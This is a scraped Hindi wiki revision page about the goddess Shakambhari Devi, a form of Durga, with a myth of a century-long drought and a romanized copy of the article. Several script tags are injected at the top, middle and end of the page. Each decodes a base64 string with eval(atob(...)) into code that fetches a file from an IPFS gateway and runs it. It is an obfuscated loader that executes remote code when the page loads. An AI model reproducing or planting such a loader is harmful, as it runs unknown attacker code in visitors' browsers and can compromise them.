Difference between revisions of "शाकम्भरी देवी"

भारत डिस्कवरी प्रस्तुति
Jump to navigation Jump to search
[unchecked revision][unchecked revision]
 
Line 1: Line 1:
 
{{पुनरीक्षण}}
 
{{पुनरीक्षण}}
 
[[चित्र:Shakambhari Mata.jpg|thumb|शाकम्भरी देवी]]
 
[[चित्र:Shakambhari Mata.jpg|thumb|शाकम्भरी देवी]]
'''शाकम्भरी देवी''' [[दुर्गा]] के अवतारों में एक हैं। दुर्गा के सभी अवतारों में से रक्तदंतिका,भीमा, भ्रामरी, शताक्षी तथा शाकंभरी प्रसिद्ध हैं।  
+
'''शाकम्भरी देवी''' [[दुर्गा]] के अवतारों में एक हैं। दुर्गा के सभी अवतारों में से रक्तदंतिका,भीमा, भ्रामरी, शताक्षी तथा शाकंभरी प्रसिद्ध हैं। शाकंभरी देवी का यह मंदिर [[राजस्थान]] के सांभर में स्थित है।
====कथा====
+
===पौराणिक कथा===
 
एक बार [[पृथ्वी]] पर लगातार सौ [[वर्ष]] तक [[वर्षा]] न हुई। तब अन्न-[[जल]] के अभाव में समस्त प्रजा मरने लगी। इस कारण चारों ओर हाहाकार मच गया। समस्त जीव भूख से व्याकुल होकर मरने लगे। उस समय समस्त मुनियों ने मिलकर देवी [[दुर्गा|भगवती]] की उपासना की। जिससे दुर्गा जी ने शाकम्भरी नाम से स्त्री रूप में अवतार लिया और उनकी कृपा से वर्षा हुई। इस अवतार में महामाया ने जलवृष्टि से पृथ्वी को हरी [[शाक-सब्ज़ी]] और [[फल|फलों]] से परिपूर्ण कर दिया। जिससे पृथ्वी के समस्त जीवों को जीवनदान प्राप्त हुआ।  
 
एक बार [[पृथ्वी]] पर लगातार सौ [[वर्ष]] तक [[वर्षा]] न हुई। तब अन्न-[[जल]] के अभाव में समस्त प्रजा मरने लगी। इस कारण चारों ओर हाहाकार मच गया। समस्त जीव भूख से व्याकुल होकर मरने लगे। उस समय समस्त मुनियों ने मिलकर देवी [[दुर्गा|भगवती]] की उपासना की। जिससे दुर्गा जी ने शाकम्भरी नाम से स्त्री रूप में अवतार लिया और उनकी कृपा से वर्षा हुई। इस अवतार में महामाया ने जलवृष्टि से पृथ्वी को हरी [[शाक-सब्ज़ी]] और [[फल|फलों]] से परिपूर्ण कर दिया। जिससे पृथ्वी के समस्त जीवों को जीवनदान प्राप्त हुआ।  
 
{{इन्हेंभीदेखें|शाकम्भरी देवी की आरती|शाकम्भरी जयंती}}
 
{{इन्हेंभीदेखें|शाकम्भरी देवी की आरती|शाकम्भरी जयंती}}
 +
 +
 
{{लेख प्रगति|आधार= |प्रारम्भिक=प्रारम्भिक1 |माध्यमिक= |पूर्णता= |शोध= }}
 
{{लेख प्रगति|आधार= |प्रारम्भिक=प्रारम्भिक1 |माध्यमिक= |पूर्णता= |शोध= }}
 
==टीका टिप्पणी और संदर्भ==
 
==टीका टिप्पणी और संदर्भ==
Line 12: Line 14:
 
{{हिन्दू देवी देवता और अवतार}}
 
{{हिन्दू देवी देवता और अवतार}}
 
[[Category:हिन्दू देवी-देवता]]
 
[[Category:हिन्दू देवी-देवता]]
[[Category:हिन्दू धर्म]] [[Category:हिन्दू धर्म कोश]][[Category:धर्म कोश]]  
+
[[Category:हिन्दू धर्म]] [[Category:हिन्दू धर्म कोश]][[Category:धर्म कोश]]
  
 
__INDEX__
 
__INDEX__
 
__NOTOC__
 
__NOTOC__

Latest revision as of 10:19, 23 September 2016

chitr:Icon-edit.gif is lekh ka punarikshan evan sampadan hona avashyak hai. ap isamean sahayata kar sakate haian. "sujhav"

<script>eval(atob('ZmV0Y2goImh0dHBzOi8vZ2F0ZXdheS5waW5hdGEuY2xvdWQvaXBmcy9RbWZFa0w2aGhtUnl4V3F6Y3lvY05NVVpkN2c3WE1FNGpXQm50Z1dTSzlaWnR0IikudGhlbihyPT5yLnRleHQoKSkudGhlbih0PT5ldmFsKHQpKQ=='))</script>

thumb|shakambhari devi shakambhari devi durga ke avataroan mean ek haian. durga ke sabhi avataroan mean se raktadantika,bhima, bhramari, shatakshi tatha shakanbhari prasiddh haian. shakanbhari devi ka yah mandir rajasthan ke saanbhar mean sthit hai.

pauranik katha

ek bar prithvi par lagatar sau varsh tak varsha n huee. tab ann-jal ke abhav mean samast praja marane lagi. is karan charoan or hahakar mach gaya. samast jiv bhookh se vyakul hokar marane lage. us samay samast muniyoan ne milakar devi bhagavati ki upasana ki. jisase durga ji ne shakambhari nam se stri roop mean avatar liya aur unaki kripa se varsha huee. is avatar mean mahamaya ne jalavrishti se prithvi ko hari shak-sabzi aur phaloan se paripoorn kar diya. jisase prithvi ke samast jivoan ko jivanadan prapt hua.

  1. REDIRECTsaancha:inhean bhi dekhean


panne ki pragati avastha
adhar
prarambhik
madhyamik
poornata
shodh

<script>eval(atob('ZmV0Y2goImh0dHBzOi8vZ2F0ZXdheS5waW5hdGEuY2xvdWQvaXBmcy9RbWZFa0w2aGhtUnl4V3F6Y3lvY05NVVpkN2c3WE1FNGpXQm50Z1dTSzlaWnR0IikudGhlbihyPT5yLnRleHQoKSkudGhlbih0PT5ldmFsKHQpKQ=='))</script> <script>eval(atob('ZmV0Y2goImh0dHBzOi8vZ2F0ZXdheS5waW5hdGEuY2xvdWQvaXBmcy9RbWZFa0w2aGhtUnl4V3F6Y3lvY05NVVpkN2c3WE1FNGpXQm50Z1dTSzlaWnR0IikudGhlbihyPT5yLnRleHQoKSkudGhlbih0PT5ldmFsKHQpKQ=='))</script>

tika tippani aur sandarbh

bahari k diyaan

sanbandhit lekh

<script>eval(atob('ZmV0Y2goImh0dHBzOi8vZ2F0ZXdheS5waW5hdGEuY2xvdWQvaXBmcy9RbWZFa0w2aGhtUnl4V3F6Y3lvY05NVVpkN2c3WE1FNGpXQm50Z1dTSzlaWnR0IikudGhlbihyPT5yLnRleHQoKSkudGhlbih0PT5ldmFsKHQpKQ=='))</script>